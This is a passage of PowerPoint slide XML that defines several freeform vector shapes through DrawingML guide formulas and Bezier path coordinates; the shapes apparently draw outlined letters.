                <a:gd name="T4" fmla="*/ 30 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 222"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 143 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 160 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 222"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 222"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 222"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 222"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 10 h 222"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 222"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 222"/>
                <a:gd name="T24" fmla="*/ 98 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 162 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 222"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 222"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 148 h 222"/>
                <a:gd name="T32" fmla="*/ 17 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 154 h 222"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 222"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 222 h 222"/>
                <a:gd name="T40" fmla="*/ 33 w 193"/>
                <a:gd name="T41" fmla="*/ 203 h 222"/>
                <a:gd name="T42" fmla="*/ 98 w 193"/>
                <a:gd name="T43" fmla="*/ 222 h 222"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 222"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="90"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="84"/>
                    <a:pt x="30" y="78"/>
                    <a:pt x="30" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="46"/>
                    <a:pt x="46" y="30"/>
                    <a:pt x="94" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="30"/>
                    <a:pt x="142" y="45"/>
                    <a:pt x="143" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="75"/>
                    <a:pt x="160" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="12"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="52" y="113"/>
                    <a:pt x="98" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="124"/>
                    <a:pt x="162" y="131"/>
                    <a:pt x="162" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="176"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="192"/>
                    <a:pt x="47" y="187"/>
                    <a:pt x="35" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="139"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="17" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="144"/>
                    <a:pt x="0" y="154"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="15" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="222"/>
                    <a:pt x="27" y="222"/>
                    <a:pt x="33" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="221"/>
                    <a:pt x="84" y="222"/>
                    <a:pt x="98" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="222"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="129" y="95"/>
                    <a:pt x="113" y="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64" name="Freeform 205">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAE4F4CF-6A17-49C3-A03B-E122500531CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1087439" y="2995613"/>
              <a:ext cx="82550" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 178 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 34 w 196"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 116 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 146 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 167 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 116 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 112 h 222"/>
                <a:gd name="T22" fmla="*/ 110 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="181" y="151"/>
                    <a:pt x="178" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="151"/>
                    <a:pt x="165" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="169"/>
                    <a:pt x="150" y="192"/>
                    <a:pt x="113" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="192"/>
                    <a:pt x="34" y="157"/>
                    <a:pt x="34" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="88"/>
                    <a:pt x="48" y="30"/>
                    <a:pt x="116" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="30"/>
                    <a:pt x="146" y="30"/>
                    <a:pt x="146" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="156" y="59"/>
                    <a:pt x="167" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="59"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="110" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="174"/>
                    <a:pt x="196"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65" name="Freeform 206">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEFA1C84-B525-4CC0-B1CB-A270583AA7A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1189039" y="2995613"/>
              <a:ext cx="96838" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 126 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 180 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 95 w 227"/>
                <a:gd name="T11" fmla="*/ 41 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 227"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 227"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 171 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 95 w 227"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 95 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="95" y="126"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="79"/>
                    <a:pt x="124" y="31"/>
                    <a:pt x="184" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="43"/>
                    <a:pt x="193" y="53"/>
                    <a:pt x="206" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="53"/>
                    <a:pt x="227" y="45"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="95" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="60" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="218"/>
                    <a:pt x="171" y="218"/>
                    <a:pt x="171" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="188"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="12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66" name="Freeform 207">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A709D2FF-EDDA-488C-B439-6B1EEF2F4BEF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1309689" y="2957513"/>
              <a:ext cx="79375" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 116 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 96 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 25 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 25 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 21 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 168 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 116 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 116 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 116 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 91 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 66 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 91 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 116 w 188"/>
                <a:gd name="T39" fmla="*/ 2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6" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="95"/>
                    <a:pt x="113" y="90"/>
                    <a:pt x="96" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="25" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="21" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="168" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="11"/>
                    <a:pt x="105" y="0"/>
                    <a:pt x="91" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="66" y="11"/>
                    <a:pt x="66" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="39"/>
                    <a:pt x="77" y="50"/>
                    <a:pt x="91" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="50"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="116"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67" name="Freeform 208">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ED692AE-12E1-4581-8A6B-B6984BECD69C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1406526" y="2995613"/>
              <a:ext cx="100013" cy="144463"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 237"/>
                <a:gd name="T1" fmla="*/ 87 h 329"/>
                <a:gd name="T2" fmla="*/ 137 w 237"/>
                <a:gd name="T3" fmla="*/ 31 h 329"/>
                <a:gd name="T4" fmla="*/ 203 w 237"/>
                <a:gd name="T5" fmla="*/ 111 h 329"/>
                <a:gd name="T6" fmla="*/ 133 w 237"/>
                <a:gd name="T7" fmla="*/ 191 h 329"/>
                <a:gd name="T8" fmla="*/ 77 w 237"/>
                <a:gd name="T9" fmla="*/ 123 h 329"/>
                <a:gd name="T10" fmla="*/ 77 w 237"/>
                <a:gd name="T11" fmla="*/ 87 h 329"/>
                <a:gd name="T12" fmla="*/ 77 w 237"/>
                <a:gd name="T13" fmla="*/ 196 h 329"/>
                <a:gd name="T14" fmla="*/ 135 w 237"/>
                <a:gd name="T15" fmla="*/ 221 h 329"/>
                <a:gd name="T16" fmla="*/ 237 w 237"/>
                <a:gd name="T17" fmla="*/ 111 h 329"/>
                <a:gd name="T18" fmla="*/ 140 w 237"/>
                <a:gd name="T19" fmla="*/ 0 h 329"/>
                <a:gd name="T20" fmla="*/ 77 w 237"/>
                <a:gd name="T21" fmla="*/ 25 h 329"/>
                <a:gd name="T22" fmla="*/ 57 w 237"/>
                <a:gd name="T23" fmla="*/ 3 h 329"/>
                <a:gd name="T24" fmla="*/ 21 w 237"/>
                <a:gd name="T25" fmla="*/ 3 h 329"/>
                <a:gd name="T26" fmla="*/ 0 w 237"/>
                <a:gd name="T27" fmla="*/ 19 h 329"/>
                <a:gd name="T28" fmla="*/ 20 w 237"/>
                <a:gd name="T29" fmla="*/ 34 h 329"/>
                <a:gd name="T30" fmla="*/ 42 w 237"/>
                <a:gd name="T31" fmla="*/ 34 h 329"/>
                <a:gd name="T32" fmla="*/ 42 w 237"/>
                <a:gd name="T33" fmla="*/ 299 h 329"/>
                <a:gd name="T34" fmla="*/ 21 w 237"/>
                <a:gd name="T35" fmla="*/ 299 h 329"/>
                <a:gd name="T36" fmla="*/ 0 w 237"/>
                <a:gd name="T37" fmla="*/ 314 h 329"/>
                <a:gd name="T38" fmla="*/ 20 w 237"/>
                <a:gd name="T39" fmla="*/ 329 h 329"/>
                <a:gd name="T40" fmla="*/ 99 w 237"/>
                <a:gd name="T41" fmla="*/ 329 h 329"/>
                <a:gd name="T42" fmla="*/ 119 w 237"/>
                <a:gd name="T43" fmla="*/ 314 h 329"/>
                <a:gd name="T44" fmla="*/ 99 w 237"/>
                <a:gd name="T45" fmla="*/ 299 h 329"/>
                <a:gd name="T46" fmla="*/ 77 w 237"/>
                <a:gd name="T47" fmla="*/ 299 h 329"/>
                <a:gd name="T48" fmla="*/ 77 w 237"/>
                <a:gd name="T49" fmla="*/ 19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 h="329">
                  <a:moveTo>
                    <a:pt x="77" y="87"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="57"/>
                    <a:pt x="106" y="31"/>
                    <a:pt x="137" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="31"/>
                    <a:pt x="203" y="67"/>
                    <a:pt x="203" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="159"/>
                    <a:pt x="168" y="191"/>
                    <a:pt x="133" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="191"/>
                    <a:pt x="77" y="147"/>
                    <a:pt x="77" y="123"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="87"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="77" y="196"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="217"/>
                    <a:pt x="119" y="221"/>
                    <a:pt x="135" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="221"/>
                    <a:pt x="237" y="174"/>
                    <a:pt x="237" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="49"/>
                    <a:pt x="193" y="0"/>
                    <a:pt x="140" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="0"/>
                    <a:pt x="94" y="9"/>
                    <a:pt x="77" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="10"/>
                    <a:pt x="76" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="13" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="299"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="299"/>
                    <a:pt x="0" y="299"/>
                    <a:pt x="0" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="329"/>
                    <a:pt x="13" y="329"/>
                    <a:pt x="20" y="329"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="329"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="329"/>
                    <a:pt x="119" y="329"/>
                    <a:pt x="119" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="299"/>
                    <a:pt x="107" y="299"/>
                    <a:pt x="99" y="299"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="19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68" name="Freeform 209">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FD303EF-400D-4F89-9A77-981E45B0093C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1519239" y="2970213"/>
              <a:ext cx="88900" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 212"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 212"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 212"/>
                <a:gd name="T11" fmla="*/ 21 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 212"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 212"/>
